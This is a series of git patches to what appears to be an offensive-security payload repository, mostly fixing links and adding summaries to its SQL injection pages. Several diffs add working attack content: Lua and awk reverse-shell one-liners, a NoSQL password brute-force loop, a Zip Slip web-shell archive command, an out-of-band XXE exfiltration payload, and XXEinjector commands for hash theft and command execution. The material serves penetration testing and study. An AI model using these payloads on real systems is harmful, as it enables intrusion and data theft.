1a475e71..9dd034c4 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -5,8 +5,8 @@ * [MYSQL Comment](#mysql-comment) * [MYSQL Union Based](#mysql-union-based) * [Detect columns number](#detect-columns-number) - * [Extract database with information_schema](#extract-database-with-information-schema) - * [Extract data without information_schema](#extract-data-without-information-schema) + * [Extract database with information_schema](#extract-database-with-information_schema) + * [Extract columns name without information_schema](#extract-columns-name-without-information_schema) * [Extract data without columns name](#extract-data-without-columns-name) * [MYSQL Error Based](#mysql-error-based) * [MYSQL Error Based - Basic](#mysql-error-based---basic) @@ -15,10 +15,10 @@ * [MYSQL Blind](#mysql-blind) * [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent) * [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement) - * [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set) + * [MYSQL Blind with MAKE_SET](#mysql-blind-with-make_set) * [MYSQL Blind with LIKE](#mysql-blind-with-like) * [MYSQL Time Based](#mysql-time-based) - * [Using SLEEP in a subselect](#using-asleep-in-a-subselect) + * [Using SLEEP in a subselect](#using-sleep-in-a-subselect) * [Using conditional statements](#using-conditional-statements) * [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot) * [MYSQL Current queries](#mysql-current-queries) From ca59b1d21789f95fbce1b41a3a1397fe93dfbf01 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 18:44:28 +0530 Subject: [PATCH 093/222] Fixed Broken Links in MSSQL Injection Fixed Broken Links in MSSQL Injection --- SQL Injection/MSSQL Injection.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index fa30aa67..0e793653 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -5,18 +5,18 @@ * [MSSQL comments](#mssql-comments) * [MSSQL version](#mssql-version) * [MSSQL database name](#mssql-database-name) -* [MSSQL List databases](#mssql-list-database) +* [MSSQL List databases](#mssql-list-databases) * [MSSQL List columns](#mssql-list-columns) * [MSSQL List tables](#mssql-list-tables) -* [MSSQL Extract user/password](#mssql-extract-user-password) +* [MSSQL Extract user/password](#mssql-extract-userpassword) * [MSSQL Union Based](#mssql-union-based) * [MSSQL Error Based](#mssql-error-based) * [MSSQL Blind Based](#mssql-blind-based) * [MSSQL Time Based](#mssql-time-based) -* [MSSQL Stacked query](#mssql-stack-query) +* [MSSQL Stacked query](#mssql-stacked-query) * [MSSQL Command execution](#mssql-command-execution) * [MSSQL UNC path](#mssql-unc-path) -* [MSSQL Make user DBA](#mssql-make-user-dba) +* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin) ## MSSQL comments From 20d6599772a6ce3774fda00dbe64f8c585d4abf5 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 18:57:33 +0530 Subject: [PATCH 094/222] Added Summary --- SQL Injection/OracleSQL Injection.md | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/SQL Injection/OracleSQL Injection.md b/SQL Injection/OracleSQL Injection.md index 0228cd9d..633e24c7 100644 --- a/SQL Injection/OracleSQL Injection.md +++ b/SQL Injection/OracleSQL Injection.md @@ -1,5 +1,18 @@ # Oracle SQL Injection +## Summary + +* [Oracle SQL version](#oracle-sql-version) +* [Oracle SQL database name](#oracle-sql-database-name) +* [Oracle SQL List databases](#oracle-sql-list-databases) +* [Oracle SQL List columns](#oracle-sql-list-columns) +* [Oracle SQL List tables](#oracle-sql-list-tables) +* [Oracle SQL Error Based](#oracle-sql-error-based) +* [Oracle SQL Blind](#oracle-sql-blind) +* [Oracle SQL Time Based](#oracle-sql-time-based) +* [Oracle SQL Command execution](#oracle-sql-command-execution) +* [References](#references) + ## Oracle SQL version ```sql @@ -21,7 +34,7 @@ SELECT SYS.DATABASE_NAME FROM DUAL; SELECT DISTINCT owner FROM all_tables; ``` -## Oracle SQL List Column +## Oracle SQL List Columns ```sql SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'; From 4b1f7e629d740c0cb71848983fe0ec06bb37c844 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 19:06:41 +0530 Subject: [PATCH 095/222] Fixed Broken Links in PostgreSQL Injection --- SQL Injection/PostgreSQL Injection.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index 2bf952ce..00bbbf41 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -20,8 +20,8 @@ * [PostgreSQL File Read](#postgresql-file-read) * [PostgreSQL File Write](#postgresql-file-write) * [PostgreSQL Command execution](#postgresql-command-execution) - * [CVE-2019–9193](#cve-2019–9193) - * [Using libc.so.6](#using-libc-so-6) + * [CVE-2019–9193](#cve-20199193) + * [Using libc.so.6](#using-libcso6) * [References](#references) ## PostgreSQL Comments From a69c2acb7d61a94abc553d03a906c54704820392 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 19:22:49 +0530 Subject: [PATCH 096/222] Added Summary in SQLite Injection --- SQL Injection/SQLite Injection.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md index 0631c0bd..428e806a 100644 --- a/SQL Injection/SQLite Injection.md +++ b/SQL Injection/SQLite Injection.md @@ -1,5 +1,18 @@ # SQLite Injection +## Summary + +* [SQLite comments](#sqlite-comments) +* [SQLite version](#sqlite-version) +* [Integer/String based - Extract table name](#integerstring-based---extract-table-name) +* [Integer/String based - Extract column name](#integerstring-based---extract-column-name) +* [Boolean - Count number of tables](#boolean---count-number-of-tables) +* [Boolean - Enumerating table name](#boolean---enumerating-table-name) +* [Boolean - Extract info](#boolean---extract-info) +* [Time based](#time-based) +* [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database) +* [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension) +* [References](#references) ## SQLite comments ```sql From fe8c7be2fb80679255c4451f9a8b3e9d9725c272 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 19:33:09 +0530 Subject: [PATCH 097/222] Fixed Broken Links in SQL injection README.md --- SQL Injection/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 8099f6df..5074f5fe 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -21,7 +21,7 @@ Attempting to manipulate SQL queries may have goals including: * [SQL injection using SQLmap](#sql-injection-using-sqlmap) * [Basic arguments for SQLmap](#basic-arguments-for-sqlmap) * [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent) - * [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragent-header-referer-cookie) + * [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragentheaderreferercookie) * [Second order injection](#second-order-injection) * [Shell](#shell) * [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit) @@ -29,7 +29,7 @@ Attempting to manipulate SQL queries may have goals including: * [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap) * [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy) * [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection) - * [General tamper option and tamper's list](#general-tamper-option-and-tamper-s-list) + * [General tamper option and tamper's list](#general-tamper-option-and-tampers-list) * [Authentication bypass](#authentication-bypass) * [Polyglot injection](#polyglot-injection-multicontext) * [Routed injection](#routed-injection) From 4d94e553b9fed521232a60cde01ade899ab02c75 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 19:42:49 +0530 Subject: [PATCH 098/222] Added Summary in Cassandra Injection --- SQL Injection/Cassandra Injection.md | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/SQL Injection/Cassandra Injection.md b/SQL Injection/Cassandra Injection.md index e66949ec..2396618f 100644 --- a/SQL Injection/Cassandra Injection.md +++ b/SQL Injection/Cassandra Injection.md @@ -2,6 +2,14 @@ > Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system +## Summary + +* [Cassandra comment](#cassandra-comment) +* [Cassandra - Login Bypass](#cassandra---login-bypass) + * [Login Bypass 0](#login-bypass-0) + * [Login Bypass 1](#login-bypass-1) +* [References](#references) + ## Cassandra comment ```sql @@ -34,4 +42,4 @@ Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://h ## References -* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/) \ No newline at end of file +* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/) From d41e0d33bde447476bf457ed93451a9504e50890 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 19:47:42 +0530 Subject: [PATCH 099/222] Added Summary in Hibernate Query Language Injection --- SQL Injection/HQL Injection.md | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/SQL Injection/HQL Injection.md b/SQL Injection/HQL Injection.md index 0086f106..6e8168be 100644 --- a/SQL Injection/HQL Injection.md +++ b/SQL Injection/HQL Injection.md @@ -1,6 +1,12 @@ # Hibernate Query Language Injection > Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia +## Summary + +* [HQL Comments](#hql-comments) +* [HQL List Columns](#hql-list-columns) +* [HQL Error Based](#hql-error-based) +* [References](#references) ## HQL Comments @@ -49,4 +55,4 @@ select blogposts0_.id as id18_, blogposts0_.author as author18_, blogposts0_.pro * [How to put a comment into HQL (Hibernate Query Language)? - Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language) * [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf) * [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm) -* [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/) \ No newline at end of file +* [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/) From 694e9e4dbd503eb80e9650eb5d8a6979826abb6c Mon Sep 17 00:00:00 2001 From: Reelix Date: Tue, 29 Oct 2019 21:11:56 +0200 Subject: [PATCH 100/222] Added an alternate possible Found condition to POST --- NoSQL Injection/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md index b52f6bfa..7c203b8c 100644 --- a/NoSQL Injection/README.md +++ b/NoSQL Injection/README.md @@ -89,8 +89,8 @@ while True: for c in string.printable: if c not in ['*','+','.','?','|']: payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c) - r = requests.post(u, data = payload, headers = headers, verify = False) - if 'OK' in r.text: + r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False) + if 'OK' in r.text or r.status_code == 302: print("Found one more char : %s" % (password+c)) password += c ``` From 6b22d53257a272b2facac28cbc6a487f58fc8015 Mon Sep 17 00:00:00 2001 From: Dave <47663767+cydave@users.noreply.github.com> Date: Tue, 29 Oct 2019 19:31:07 +0000 Subject: [PATCH 101/222] Fix lua reverse shell quote issue The single quotes around `io.popen` prevented the one-liner to be executed. This change should fix that :) --- Methodology and Resources/Reverse Shell Cheatsheet.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index cf91cc25..60cd02a9 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -203,7 +203,7 @@ lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','424 Windows and Linux ```powershell -lua5.1 -e 'local host, port = "10.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' +lua5.1 -e 'local host, port = "10.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' ``` ### NodeJS From b36e5262bd5af2461a7112ab34ef45b190ebef38 Mon Sep 17 00:00:00 2001 From: Hi15358 Date: Wed, 30 Oct 2019 11:19:52 +0800 Subject: [PATCH 102/222] Create Readme --- Zip Slip/Readme | 1 + 1 file changed, 1 insertion(+) create mode 100644 Zip Slip/Readme diff --git a/Zip Slip/Readme b/Zip Slip/Readme new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/Zip Slip/Readme @@ -0,0 +1 @@ + From bd121bfccb2d4cbe06ebcfd81b6c1bc293be1fa0 Mon Sep 17 00:00:00 2001 From: Hi15358 Date: Wed, 30 Oct 2019 11:24:35 +0800 Subject: [PATCH 103/222] Delete Readme --- Zip Slip/Readme | 1 - 1 file changed, 1 deletion(-) delete mode 100644 Zip Slip/Readme diff --git a/Zip Slip/Readme b/Zip Slip/Readme deleted file mode 100644 index 8b137891..00000000 --- a/Zip Slip/Readme +++ /dev/null @@ -1 +0,0 @@ - From 5f31044ae3ccdaeb5a4e67c4302dd7fcc88a81c1 Mon Sep 17 00:00:00 2001 From: Hi15358 Date: Wed, 30 Oct 2019 11:24:56 +0800 Subject: [PATCH 104/222] Create ReadMe.txt --- Upload Insecure Files/Zip Slip/ReadMe.txt | 1 + 1 file changed, 1 insertion(+) create mode 100644 Upload Insecure Files/Zip Slip/ReadMe.txt diff --git a/Upload Insecure Files/Zip Slip/ReadMe.txt b/Upload Insecure Files/Zip Slip/ReadMe.txt new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/Upload Insecure Files/Zip Slip/ReadMe.txt @@ -0,0 +1 @@ + From 5fec4f7c21c9a416fd481120e246e49a5b3774a7 Mon Sep 17 00:00:00 2001 From: Hi15358 Date: Wed, 30 Oct 2019 11:36:09 +0800 Subject: [PATCH 105/222] Update Java.md --- Insecure Deserialization/Java.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/Insecure Deserialization/Java.md b/Insecure Deserialization/Java.md index f3606d14..59156880 100644 --- a/Insecure Deserialization/Java.md +++ b/Insecure Deserialization/Java.md @@ -63,10 +63,12 @@ JRE8u20_RCE_Gadget JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool, [https://github.com/joaomatosf/jexboss](https://github.com/joaomatosf/jexboss) +ysoserial-modified [https://github.com/pimps/ysoserial-modified](https://github.com/pimps/ysoserial-modified) + ## References - [Github - ysoserial](https://github.com/frohoff/ysoserial) - [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) - [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) - [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) -- [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html) \ No newline at end of file +- [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html) From 83569c614268dff78973e20b344192766fa0ed63 Mon Sep 17 00:00:00 2001 From: Hi15358 Date: Wed, 30 Oct 2019 12:07:50 +0800 Subject: [PATCH 106/222] Update and rename ReadMe.txt to README.md --- Upload Insecure Files/Zip Slip/README.md | 35 +++++++++++++++++++++++ Upload Insecure Files/Zip Slip/ReadMe.txt | 1 - 2 files changed, 35 insertions(+), 1 deletion(-) create mode 100644 Upload Insecure Files/Zip Slip/README.md delete mode 100644 Upload Insecure Files/Zip Slip/ReadMe.txt diff --git a/Upload Insecure Files/Zip Slip/README.md b/Upload Insecure Files/Zip Slip/README.md new file mode 100644 index 00000000..39d647e6 --- /dev/null +++ b/Upload Insecure Files/Zip Slip/README.md @@ -0,0 +1,35 @@ +# Zip Slip + +> The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../shell.php). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine. + +## Summary + +- [Detection](#detection) +- [Tools](#tools) +* [Exploits](#exploits) + * [Basic Exploit](#basic-exploit) +- [Additional Notes](#additional-notes) + +## Detection + +- Any zip upload page on the application + +## Tools + +- evilarc [https://github.com/ptoomey3/evilarc](https://github.com/ptoomey3/evilarc) + +## Exploits + +### Basic Exploit + +```python +python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15 +``` + +### Additional Notes +- For affected libraries and projects, visit https://github.com/snyk/zip-slip-vulnerability + +## References + +- [Zip Slip Vulnerability - Snyk Ltd, 2019](https://snyk.io/research/zip-slip-vulnerability) +- [Zip Slip - snyk, 2019](https://github.com/snyk/zip-slip-vulnerability) diff --git a/Upload Insecure Files/Zip Slip/ReadMe.txt b/Upload Insecure Files/Zip Slip/ReadMe.txt deleted file mode 100644 index 8b137891..00000000 --- a/Upload Insecure Files/Zip Slip/ReadMe.txt +++ /dev/null @@ -1 +0,0 @@ - From 83f46a22e3d845ddc8d1b106d3236bbc374e2561 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Sat, 2 Nov 2019 00:54:48 +0100 Subject: [PATCH 107/222] add XXE via SVG rasterization --- XXE Injection/README.md | 37 ++++++++++++++++++++++++++++++++++++- 1 file changed, 36 insertions(+), 1 deletion(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index d4792dd6..ba1bb59b 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -364,7 +364,9 @@ Assuming payloads such as the previous return a verbose error. You can start poi ``` -``` +**Classic** + +```xml ]> @@ -372,6 +374,38 @@ Assuming payloads such as the previous return a verbose error. You can start poi ``` +**OOB via SVG rasterization** + +*xxe.svg* + +```xml + + +%sp; +%param1; +]> + + XXE via SVG rasterization + + + + + + + &exfil; + + + +``` + +*xxe.xml* + +```xml + +"> +``` + ### XXE inside SOAP ```xml @@ -479,3 +513,4 @@ updating: xl/sharedStrings.xml (deflated 17%) * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) - [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) - [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) +- [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube) From 775d10c256fb47b8494d90a1eef466b7a9c3e740 Mon Sep 17 00:00:00 2001 From: Dave <47663767+cydave@users.noreply.github.com> Date: Sun, 3 Nov 2019 16:07:16 +0000 Subject: [PATCH 108/222] Fix awk snippet A small typo in the awk one-liner prevents successful execution of the command. ``` awk: cmd. line:1: warning: remote host and port information (10.0.0.1>, 4242) invalid: Name or service not known awk: cmd. line:1: fatal: can't open two way pipe `/inet/tcp/0/10.0.0.1>/4242' for input/output (No such file or directory) ``` This commit fixes this :) --- Methodology and Resources/Reverse Shell Cheatsheet.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 60cd02a9..5a4b3178 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -173,7 +173,7 @@ powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubuse ### Awk ```powershell -awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1>/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null +awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null ``` ### Java From 64f8f4d869e0fc510534b677af35bbfcbfb86aa0 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Sun, 3 Nov 2019 23:49:36 +0100 Subject: [PATCH 109/222] add ref for docker SSRF --- Server Side Request Forgery/README.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index b9c47aca..5b597361 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -628,6 +628,11 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json ``` +More info: + +- Daemon socket option: https://docs.docker.com/engine/reference/commandline/dockerd/#daemon-socket-option +- Docker Engine API: https://docs.docker.com/engine/api/latest/ + ### SSRF URL for Rancher ```powershell From 54c94e03982f15dba933fd89653bf1c87e62410b Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Sun, 3 Nov 2019 23:50:58 +0100 Subject: [PATCH 110/222] add ref for docker SSRF --- Server Side Request Forgery/README.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index b9c47aca..5b597361 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -628,6 +628,11 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json ``` +More info: + +- Daemon socket option: https://docs.docker.com/engine/reference/commandline/dockerd/#daemon-socket-option +- Docker Engine API: https://docs.docker.com/engine/api/latest/ + ### SSRF URL for Rancher ```powershell From e3604c01d7005ac7c4040bb84432e9c883c1b535 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Mon, 4 Nov 2019 01:58:15 +0100 Subject: [PATCH 111/222] XXE: tools description + more tools --- XXE Injection/README.md | 78 +++++++++++++++++++++++++---------------- 1 file changed, 47 insertions(+), 31 deletions(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index d4792dd6..4b754bde 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -34,39 +34,55 @@ Syntax: `` ## Tools -- [xxeftp](https://github.com/staaldraad/xxeserv) +- [xxeftp](https://github.com/staaldraad/xxeserv) - A mini webserver with FTP support for XXE payloads ``` - sudo ./xxeftp -uno 443 ./xxeftp -w -wps 5555 + sudo ./xxeftp -uno 443 + ./xxeftp -w -wps 5555 + ``` +- [230-OOB](https://github.com/lc/230-OOB) - An Out-of-Band XXE server for retrieving file contents over FTP and payload generation via [http://xxe.sh/](http://xxe.sh/) + ``` + $ python3 230.py 2121 + ``` +- [XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods + ```bash + # Enumerating /etc directory in HTTPS application: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl + # Enumerating /etc directory using gopher for OOB method: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher + # Second order exploitation: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt + # Bruteforcing files using HTTP out of band method and netdoc protocol: + ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc + # Enumerating using direct exploitation: + ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK + # Enumerating unfiltered ports: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all + # Stealing Windows hashes: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes + # Uploading files using Java jar: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf + # Executing system commands using PHP expect: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls + # Testing for XSLT injection: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt + # Log requests only: + ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt + ``` +- [oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF) + ``` + ruby server.rb + ``` +- [docem](https://github.com/whitel1st/docem) - Uility to embed XXE and XSS payloads in docx,odt,pptx,etc + ``` + ./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_document -kt -sx docx + ./docem.py -s samples/xxe/sample_oxml_xxe_mod1.docx -pm xxe -pf payloads/xxe_special_2.txt -kt -pt per_place + ./docem.py -s samples/xss_sample_0.odt -pm xss -pf payloads/xss_tiny.txt -pm per_place + ./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_file -kt -sx docx + ``` +- [otori](http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html) - Toolbox intended to allow useful exploitation of XXE vulnerabilities. + ``` + python ./otori.py --clone --module "G-XXE-Basic" --singleuri "file:///etc/passwd" --module-options "TEMPLATEFILE" "TARGETURL" "BASE64ENCODE" "DOCTYPE" "XMLTAG" --outputbase "./output-generic-solr" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs ``` - - [230-OOB](https://github.com/lc/230-OOB) and payload generation via [http://xxe.sh/](http://xxe.sh/) - ``` - $ python3 230.py 2121 - ``` - - [XXEinjector](https://github.com/enjoiz/XXEinjector) - ```bash - # Enumerating /etc directory in HTTPS application: - ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl - # Enumerating /etc directory using gopher for OOB method: - ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher - # Second order exploitation: - ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt - # Bruteforcing files using HTTP out of band method and netdoc protocol: - ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc - # Enumerating using direct exploitation: - ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK - # Enumerating unfiltered ports: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all - # Stealing Windows hashes: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes - # Uploading files using Java jar: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf - # Executing system commands using PHP expect: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls - # Testing for XSLT injection: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt - # Log requests only: - ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt - ``` ## Detect the vulnerability From 60050219b7b470de16e7d7dc4145f99ab054aece Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 4 Nov 2019 21:43:44 +0100 Subject: [PATCH 112/222] Impersonating Office 365 Users on Azure AD Connect --- .../Active Directory Attack.md | 64 +++++++++++++++++-- .../Linux - Persistence.md | 20 ++++++ .../Network Pivoting Techniques.md | 1 + 3 files changed, 81 insertions(+), 4 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 51d7003a..f14954e3 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -17,7 +17,7 @@ * [Password in AD User comment](#password-in-ad-user-comment) * [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets) * [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets) - * 